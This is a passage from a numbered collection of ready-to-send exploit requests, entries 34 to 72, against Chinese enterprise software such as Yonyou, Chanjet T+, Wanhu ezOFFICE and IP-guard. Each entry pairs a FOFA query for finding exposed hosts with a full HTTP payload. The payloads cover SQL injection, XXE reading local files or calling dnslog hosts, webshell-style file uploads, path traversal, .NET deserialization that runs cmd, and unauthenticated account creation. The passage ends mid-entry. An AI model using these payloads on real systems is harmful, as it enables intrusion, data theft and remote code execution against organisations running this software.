FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, and the endpoint runs it as-is and returns the result as an Excel export.

61. Zhejiang University Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based: a vulnerable host answers about five seconds later than it does for a clean sId value.

65. Youkate (优卡特) Lianaiyun face-recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Success indicator: lines 42-43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the MD5 of the injected value 102103122.
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename give the name of the written file, dir gives the directory it is written to, and fileType gives its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Time-based (about five seconds). The ;.js path-parameter suffix makes the request look like a static resource to a login filter that exempts static extensions, while the servlet container still dispatches it to wf_printnum.jsp.

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Time-based (about five seconds), with the same ;.js suffix trick as entry 68.

70. Wanhu ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header is the base64 of the command the payload executes, here type C:\Windows\win.ini.

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

Time-based (about five seconds).

72. Seeyon OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

